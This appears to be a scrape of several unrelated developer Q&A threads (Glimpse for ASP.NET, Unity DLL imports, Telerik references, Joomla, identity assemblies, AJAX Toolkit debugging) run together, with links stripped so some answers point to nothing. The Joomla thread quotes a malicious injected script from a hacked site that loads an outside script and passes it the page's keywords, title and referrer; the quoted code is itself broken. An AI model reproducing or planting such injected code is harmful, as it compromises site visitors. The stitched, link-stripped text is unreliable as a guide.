Glimpse for ASP.NET Mystery Folder -

I've installet the Glimpse NuGet package in my ASP.Ntt MVC3 web project. I'm getting errors on the web server because in my _Layout.cshtml master page there is the following reference:
<script src="#Url.Content("~/Glimpse/Resource/?resource=Pager")" type="text/javascript"></script>
There is no Glimpse directory anywhere in the web project, though. So something is wrong here.
I can't find any clues in the Glimpse documentation (which is better than most). So, is that directory supposed to be there? What puts it there? Why isn't it there on my system? Should I just remove the reference from my _Layout.cshtml?
I've tried re-installing the Glimpse NuGet package but that doesn't fix things. Any ideas how to fix this?

I'm not sure how you are getting that script tag added to your layouts file, as Glimpse does not require modifications to anything in your application except configuration.
You should be able to remove that line.
Further, let us know all of the Glimpse packages you have installed and we'll look into any misbehaving packages.

Actually one thing that i found using google that this is somehow linked to ELMAH logger:
Hope that will help you or give the idea

It's most likely (supposed to be?) handled by MVC routing. Looks like the code for Glimpse is here: so dig in. :D


Add dll´s from .nupkg to Unity Project without using nuget

I am trying to use Microsoft´s WorldLockingTools (repo see here) in my Unity Mixed Reality project. Therefore I need to add the Frozen World Engine DLL to my Unity Project. In Microsoft´s Documentation they describe to do this via nuget. I want to add the dependencies manually like described in this thread, since for me it´s not possible to use nuget (I have no network-access on that computer). I was able to extract the .dll, but if I add it to my project as described in that thread, unity still can´t find the dll. Do I need to do some further steps than just adding the dll to my Asset-Folder? If yes, can you please tell me which steps they are? I would be really thankful for that!
Best regards!
OK I figured out the reason behind this misbehavior. The problem is, that there is a c#-Script within the nuget-package additional to the dlls which has to be placed within the WorldLocking.Engine folder. After that all Exceptions disappeared and it seems to work now! I Hope I could help anybody who comes across this Question.

The Type or namespace name "WinContols" does not exist in the namespace 'Telerik'

I picked up an Desktop Application written in ASP .NET Web Forms that has been developer 5 years ago and the person is not around. I do need to make some changes but I am stuck and getting it running. (I am using VS17)
I google the issue but unfortunately there is so little out there about it and most of them are really old.
I am missing come Telerik References. To be exact here are list of them.
I have tried this one but was not successful. I followed the steps here but got stock at adding
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.NETFramework\AssemblyFolders\Telerik UI for WinForms Q1 2014]#="C:\Program Files\Telerik\UI for WinForms\Q1 2014\bin\"
My Telerik looks to be installed at
C:\Program Files (x86)\Progress\Telerik UI for ASP.NET AJAX R1 2019
I do not have a bin folder.
And if I go to those bin folders I don't have anything like Telerik.WinControls.****
I am not sure if it is still supported or what I am doing wrong. I have got bunch of other errors but I have a feeling that they are all related to these missing namespaces.
Any help would be much apricated.
Based on first comment, I was able to fix that issue. Thanks for that!
I have got this error now. Not quiet clear to me how to approach this. Any thoughts?

joomla reading from unkown server

recently I've noticed that before my site is loaded, it starts to load data from some site. I think that either my joomla was hacked or I downloaded some wrong extension. The question is what to do now. Should I do clean install of Joomla or is there any simplier solution? Any help would by highly appreciated.
Here is the code which I find ins source code of page, which in my opinion, shouln't be there. Could someone tell me what the code is doing? Is it harmful?
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="'+encodeURIComponent(''+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent('"><'+'/script>');}</script>
I've managed to solved the issue for now by manually deleted the harmful script from every index.php page from hosting (from all joomla templates).
Your website is most likely hacked. Try this super fast cleanup instructions:
Make sure that once you cleanup your website, you only allow the "index.php" file to be executed by Apache.
Hope this helps!

using Microsoft.IdentityModel.Claims; fails in my Home controller!

I'm following the Microsoft guide for implementing federated identities. As it doesn't state where the code should be placed I created a file \App_Code\Auth.cs for it. when it's time to implement the FederationResult to my home controller I try to use the aforementioned namespace but VS complains of missing an assembly reference.
The weird thing is that the code in Auth.cs doesn't complain... I've looked in the References item of the project and don't see anything I can recognise, although I did "Add STS reference" to the project. I've also looked in NuGet but don't see anything I should add...
what's going on here?
hmm... seems I just needed to add the reference manually. I don't know how come the assembly is available to some pieces of the code and not to others but it works!
One more thing, I needed to use Microsoft.IdentityModel.Web not .Claims

Exception thrown in a referenced .dll how do I debug?

I'm using watermark extenders on textboxes and an exception is being thrown from the AJAX Control Toolkit .dll. It's strange because this just started happening.
I tried debugging from the Ajax solution and Ajax examples (but with my code), but no dice.
Is there a way to step into the Ajax .dll from my solution to see where this is happening?
Couldn't you just get the source for the Ajax Control Toolkit and include it as a project in your solution and then reference it? You'd then be able to step into the code and if you really needed to, you can just put the precompiled one out when you deploy out.
The source code for the AJAX Control Toolkit is available from:
Just download and start debugging.
You don't need to include the AjaxControlToolkit project. Just open the file you need (in the VS instance where your code that currently breaks is), and set a breakpoint where appropriate.
Maybe a black box approach is more appropriate here. You said that this error just started - what has changed in your environment to start this? You may be headed down a rabbit hole by stepping through the code. Can you deploy to a clean environment and not get the error? Or, does it work in the dev but not the test environment?
